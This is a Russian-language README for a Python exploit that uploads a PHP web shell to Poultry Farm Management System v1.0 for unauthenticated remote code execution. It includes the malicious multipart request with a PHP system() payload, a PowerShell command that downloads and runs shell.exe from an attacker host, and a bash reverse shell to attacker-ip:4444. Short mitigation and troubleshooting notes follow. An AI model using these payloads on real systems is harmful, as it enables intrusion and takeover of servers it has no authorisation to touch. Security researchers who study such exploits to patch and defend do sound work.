
Python-эксплойт для неаутентифицированного удаленного выполнения кода через загрузку файлов в Poultry Farm Management System v1.0. Загружает PHP-шеллы для выполнения произвольных системных команд на уязвимых целях.
Неаутентифицированная загрузка файлов с удалённым выполнением кода
Система управления птицефермой v1.0 содержит критическую уязвимость в функционале загрузки товаров. Приложение не выполняет надлежащую проверку и санитизацию загружаемых файлов, что позволяет злоумышленникам загружать PHP-файлы, замаскированные под изображения товаров. Эти загруженные PHP-файлы могут быть выполнены для достижения удалённого выполнения кода.
POST /paultry/farm/product.php или POST /farm/product.php
Уязвимость может быть использована следующим образом:
requestscolorama (для цветного вывода)pip install requests colorama
Или установите все зависимости:
pip install -r requirements.txt
Запустите скрипт в интерактивном режиме:
python exploit.py
Скрипт запросит:
==================================================
Интерактивный инструмент загрузки бэкдора
==================================================
Введите IP-адрес цели: 192.168.1.100
Введите порт цели (по умолчанию: 80): 8080
Введите команду для выполнения (по умолчанию: powershell payload):
Команда: whoami
==================================================
ПОДТВЕРЖДЕНИЕ
==================================================
Целевой URL: http://192.168.1.100:8080
Команда: whoami
Вы хотите продолжить? (да/нет): да
✅ Интерактивный ввод — запрос IP, порта и пользовательских команд
✅ Значения по умолчанию — разумные значения по умолчанию для удобства
✅ Цветной вывод — легко читаемый цветной вывод в терминале
✅ Шаг подтверждения — проверка настроек перед выполнением
✅ Обработка ошибок — понятные сообщения об ошибках при неудачных запросах
✅ Гибкие команды — поддержка любых команд оболочки или полезных нагрузок PowerShell
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
Эксплойт протестирован на:
⚠️ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ
Данный инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен.
Обновление ПО — установите доступные исправления безопасности
Проверка загружаемых файлов
Настройка
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Контроль доступа
Мониторинг
Ошибка: Соединение отклонено
Решение: Проверьте правильность IP-адреса и порта цели, а также то, что приложение работает
Ошибка: Не удалось загрузить шелл. Код состояния: 404
Решение: Путь к конечной точке может отличаться. Распространённые пути: /farm/, /paultry/farm/
Ошибка: Вывод команды пуст
Решение: Возможно, выполнение PHP отключено, или файл был загружен некорректно
По вопросам, проблемам или предложениям обращайтесь к репозиторию на GitHub или странице Exploit-DB.
Последнее обновление: Декабрь 2024
Статус: Проверено и протестировано